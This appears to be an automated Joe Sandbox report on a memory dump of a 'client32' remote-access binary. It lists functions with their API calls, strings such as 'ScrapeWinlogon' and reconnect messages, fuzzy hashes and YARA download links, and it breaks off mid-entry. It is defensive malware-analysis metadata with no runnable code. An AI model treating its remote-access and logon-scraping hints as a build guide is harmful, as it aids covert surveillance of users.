Instruction ID: d3742dddefd9539a2c6faf75fa5aff6455038083edce66c72e6810edab36b23a
Opcode Fuzzy Hash: 1467557cae63413adfea8cf217ea5322af11f329c2c3a2257ad9f516cd4137f2
Instruction Fuzzy Hash: 39B1D979E0121A9BDF04CFA4CC80AEEB7B5EF88718F144669F915A7380DB71AD44CB94

Function 11049430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 110494A9
_strncpy.LIBCMT ref: 110494B5
_strncpy.LIBCMT ref: 110494F9

Strings

Client., xrefs: 110494BD

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strncpy
String ID: Client.
API String ID: 2961919466-3668916897
Opcode ID: c1fb8859e18d76fc1079392e84fc703e70aac477c314df1099eb761ae4e062e0
Instruction ID: 572398fb48615d3f05e5c1c88e4c2dd5f7b798ba22a18aad523c76445d718ab6
Opcode Fuzzy Hash: c1fb8859e18d76fc1079392e84fc703e70aac477c314df1099eb761ae4e062e0
Instruction Fuzzy Hash: E24196B5D002499FDB50CF78C8C5BEABBF4AF49314F1441A9E918E7241EB35AA04CBA0

Function 11037950 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 129timeCOMMON

Download Yara Rule

APIs

GetDateFormatA.KERNEL32(00000400,00000002,00000000,00000000,?,00000020,2F623E72,?,?,00000000,?,00000000,1116DED1,000000FF,?,1104DB2D), ref: 1103798F
GetTimeFormatA.KERNEL32(00000400,00000002,00000000,00000000,?,00000010,?,1104DB2D,?,?,000003EF,00000000), ref: 110379A4

Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7

Strings

*pEnd == 0, xrefs: 11037A30
CLTCONN.CPP, xrefs: 11037A2B

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Format$DateTime_malloc_memsetwsprintf
String ID: *pEnd == 0$CLTCONN.CPP
API String ID: 1040960120-1699341402
Opcode ID: 48944fc5be1442c904dbae7149e78569dccf481687dccd1055de9289c08f97e1
Instruction ID: fabff71948bf7ae3357c8c7ef4a8195d4af4ef9b366a04fba8c67cff20cd1f8e
Opcode Fuzzy Hash: 48944fc5be1442c904dbae7149e78569dccf481687dccd1055de9289c08f97e1
Instruction Fuzzy Hash: B541E6B2900709AFE710CF95CCC0FAAFBE9FBC0759F40452EE90557680DB74AA068750

Function 110AB640 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 110E3390: _malloc.LIBCMT ref: 110E33C6

_free.LIBCMT ref: 110AB746
_memmove.LIBCMT ref: 110AB76C
_free.LIBCMT ref: 110AB780

Part of subcall function 11151665: HeapFree.KERNEL32(00000000,00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115167B
Part of subcall function 11151665: GetLastError.KERNEL32(00000000,?,1115A186,00000000,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 1115168D

Part of subcall function 110AB3A0: EnterCriticalSection.KERNEL32(000000FF,2F623E72,?,?,00000000,?,?,11173108,000000FF,?,110AB96C,?,00000003,00000000), ref: 110AB3EB
Part of subcall function 110AB3A0: LeaveCriticalSection.KERNEL32(?,?,?,11173108,000000FF), ref: 110AB480

Strings

Warning. Packed cursor too big, xrefs: 110AB73B

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection_free$EnterErrorFreeHeapLastLeave_malloc_memmove
String ID: Warning. Packed cursor too big
API String ID: 2786395082-2720200741
Opcode ID: 656bc3f6673a22658c7f89e5d73dc47a8f0624123099ccbe8aa227406eebd715
Instruction ID: 655e0d338036a5a73a4b074b628cb31a2b464a1d6c83f44f052109fcd25f2ab7
Opcode Fuzzy Hash: 656bc3f6673a22658c7f89e5d73dc47a8f0624123099ccbe8aa227406eebd715
Instruction Fuzzy Hash: 6041FAB5D052198FCBE0CF28D880BE9B7F5FB54308F0085EAD589A7241DE756E888F90

Function 110552B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 110552D6
GetTickCount.KERNEL32 ref: 11055366
GetTickCount.KERNEL32 ref: 1105537A

Strings

Stop reconn to %s, xrefs: 11055389

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick
String ID: Stop reconn to %s
API String ID: 536389180-2663412807
Opcode ID: 2abe557c952c5f7dcea216b9f0889483e10976acc780b42d0fe4d7d09327c2c3
Instruction ID: af3c01e96c1c7020b4005c014dfc046fba5e2fca3df96dde9e75da5347296435
Opcode Fuzzy Hash: 2abe557c952c5f7dcea216b9f0889483e10976acc780b42d0fe4d7d09327c2c3
Instruction Fuzzy Hash: 3B31A475E006059FD7A0CF78C880A9AB7F5AF89314F1086ADE85EC7285DB71E944CB50

Function 11093940 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON

Download Yara Rule

APIs

Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7

std::exception::exception.LIBCMT ref: 110939C1
__CxxThrowException@8.LIBCMT ref: 110939D6

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

IsA(), xrefs: 110939A1, 11093A1F
..\CTL32\IEFavourites.cpp, xrefs: 1109399C, 11093A1A

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$ErrorException@8ExitLastMessageProcessThrow_malloc_memsetstd::exception::exception
String ID: ..\CTL32\IEFavourites.cpp$IsA()
API String ID: 718578146-3791668299
Opcode ID: 4c89aac98c81f767bafdeeee0e8cb21839cd187aa5543172dde26d6e7bfd1f8f
Instruction ID: 6651f82349cd8d8ac5f86c43f42defd63ce41efa3d376e39aabf916cf682f162
Opcode Fuzzy Hash: 4c89aac98c81f767bafdeeee0e8cb21839cd187aa5543172dde26d6e7bfd1f8f
Instruction Fuzzy Hash: BA31D5B5D0420AAFC710CF99DC41BDAFBF8FF18604F40456EE869A7640EB75A5048BD1

Function 110D3940 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 110D3954

Part of subcall function 1114EE63: std::exception::exception.LIBCMT ref: 1114EE78
Part of subcall function 1114EE63: __CxxThrowException@8.LIBCMT ref: 1114EE8D
Part of subcall function 1114EE63: std::exception::exception.LIBCMT ref: 1114EE9E

std::_Xinvalid_argument.LIBCPMT ref: 110D3963

Strings

string too long, xrefs: 110D394F, 110D395E

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: string too long
API String ID: 963545896-2556327735
Opcode ID: 53fa2691e7ed2a5e9eb477e41bbd96b82adb283bfddc49565139c6dd30d72792
Instruction ID: e28e3258208b0399ca813df7113a1f9dcd80ca82a7847814a7e7c5b54dd77bc8
Opcode Fuzzy Hash: 53fa2691e7ed2a5e9eb477e41bbd96b82adb283bfddc49565139c6dd30d72792
Instruction Fuzzy Hash: B4210472B0C7909BD722CA6CA84069AFBE8DFA6670F104A5BE9D1CF351C3719844C7A1

Function 11037210 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 11037232

Part of subcall function 11151A96: __getptd.LIBCMT ref: 11151AB4

_strtok.LIBCMT ref: 110372B3

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

CLTCONN.CPP, xrefs: 11037267
; >, xrefs: 11037229, 110372AC

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strtok$ErrorExitLastMessageProcess__getptdwsprintf
String ID: ; >$CLTCONN.CPP
API String ID: 3120919156-788487980
Opcode ID: 9165b0a18a4c59912c5dbe4835972a59b9c6cb766eae6eb5ab81999165ff3938
Instruction ID: ccfc037b8357edf1224686589f5a8c743ae1842636507a1361757ab53c929d04
Opcode Fuzzy Hash: 9165b0a18a4c59912c5dbe4835972a59b9c6cb766eae6eb5ab81999165ff3938
Instruction Fuzzy Hash: A621E76AE006477FDB02DEA99C40B9EB7D59F84215F0840A5FD489B341FA74AD0083E1

Function 11047220 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 1104726D
GetTickCount.KERNEL32 ref: 1104728F

Part of subcall function 1103AE60: CloseHandle.KERNEL32(00000000,110AE050,00000001,00000000,?), ref: 1103AF02

Strings

ScrapeWinlogon(true), xrefs: 1104724A
ScrapeWinlogon(false), xrefs: 110472B4

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$CloseHandle
String ID: ScrapeWinlogon(false)$ScrapeWinlogon(true)
API String ID: 3288320179-4162823169
Opcode ID: 39545d518d5d5b217dad4cfacbfe5bf09837e8122a8fbefba39c119687804820
Instruction ID: dad7b6f7502343be31355568bd77ad9becd5e116beabebea3ed844355e2a9eb8
Opcode Fuzzy Hash: 39545d518d5d5b217dad4cfacbfe5bf09837e8122a8fbefba39c119687804820
Instruction Fuzzy Hash: 7D213831F50B006BF612D73598867AAB7C5AF8071EF248439EE5B4A6C0CBA67480CB56

Function 1105F620 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 1105F660
_strtok.LIBCMT ref: 1105F690
_strtok.LIBCMT ref: 1105F6A8

Strings

,= , xrefs: 1105F65A, 1105F689, 1105F6A1

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strtok
String ID: ,=
API String ID: 1675499619-2677018336
Opcode ID: e4a83eb6bd879dd6f1f64293f5293dbff424d9e211f02fcaf1d7e2e2374799ee
Instruction ID: 7a9fbb2f34e7303a29542f3709b992e29d429b122d26399c990661d45cd0e722
Opcode Fuzzy Hash: e4a83eb6bd879dd6f1f64293f5293dbff424d9e211f02fcaf1d7e2e2374799ee
Instruction Fuzzy Hash: BF110636B002562FE7C2DD788C10BC77BD59F09245F008098E948AB250E635E840C6B2

Function 1103D5C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1103D550: IsWindow.USER32(00000000), ref: 1103D566
Part of subcall function 1103D550: FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103D57C
Part of subcall function 1103D550: IsWindow.USER32(00000000), ref: 1103D584
Part of subcall function 1103D550: Sleep.KERNEL32(00000014), ref: 1103D597
Part of subcall function 1103D550: FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103D5A7
Part of subcall function 1103D550: IsWindow.USER32(00000000), ref: 1103D5AF

IsWindow.USER32(00000000), ref: 1103D5EA
SendMessageA.USER32(00000000,0000004A,00000000,00000501), ref: 1103D5FD

Strings

PCIVideoSlave32, xrefs: 1103D608
DoMMData - could not find %s window, xrefs: 1103D60D

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Find$MessageSendSleep
String ID: DoMMData - could not find %s window$PCIVideoSlave32
API String ID: 1010850397-3146847729
Opcode ID: a02f1deb2413835855b986d31fe149332604edbd6b3a1203050ee6bfcc5d2bdb
Instruction ID: 40260b62f694b88d247e0099ba96be85712fa175176470c9008f94ddf9255897
Opcode Fuzzy Hash: a02f1deb2413835855b986d31fe149332604edbd6b3a1203050ee6bfcc5d2bdb
Instruction Fuzzy Hash: BCF02773E512187BE700EF68BC06BDEBBA89B0130AF408194ED09A62C0F6B115114BD6

Function 11087400 Relevance: 6.2, APIs: 4, Instructions: 201COMMON

Download Yara Rule

APIs

Part of subcall function 11068B70: EnterCriticalSection.KERNEL32(?,2F623E72,?,75A77CB0,75A77AA0), ref: 11068BD5
Part of subcall function 11068B70: SetEvent.KERNEL32(?,?,00000000,11066D20,?,?), ref: 11068CB2

CloseHandle.KERNEL32(00000000,00000001,000000C2,?,00000001,000000C1,?,00000001,000000C0,?,00000001,00000093,?,00000001,00000091,?), ref: 1108758A
_free.LIBCMT ref: 110875AB
CloseHandle.KERNEL32(?), ref: 110875E6
FreeLibrary.KERNEL32(?), ref: 11087606

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandle$CriticalEnterEventFreeLibrarySection_free
String ID:
API String ID: 3241181375-0
Opcode ID: 97f90a2b9532dc7094c0873dc976133b14c8770c73277285e597bf54c11473ca
Instruction ID: 769b914857c95559ccedf9963c302cb6770c9c9862fadc681d98dd4b5afd4e1e
Opcode Fuzzy Hash: 97f90a2b9532dc7094c0873dc976133b14c8770c73277285e597bf54c11473ca
Instruction Fuzzy Hash: 3851BDF8B807057AF95596704CA6FBE214E8BD4B4CF041016FA066E1C2CED7BE829325

Function 1113F700 Relevance: 6.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

APIs

Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7

std::exception::exception.LIBCMT ref: 1113F7F7
__CxxThrowException@8.LIBCMT ref: 1113F80C
std::exception::exception.LIBCMT ref: 1113F81B
__CxxThrowException@8.LIBCMT ref: 1113F830

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$_malloc_memsetwsprintf
String ID:
API String ID: 1651403513-0
Opcode ID: 4754ce91abff75684998c44684bd62a387d3770bcf39efdefb3a8636f8b0d38b
